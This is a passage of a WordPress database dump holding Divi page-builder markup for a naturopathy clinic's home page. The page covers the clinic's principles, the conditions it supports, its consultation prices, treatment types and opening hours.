Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-09-07 18:36:41','2021-09-07 10:36:41','',28,'https://verdenaturopathy.com.au/?p=355',0,'revision','',0),(364,1,'2021-12-06 13:24:39','2021-12-06 05:24:39','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" 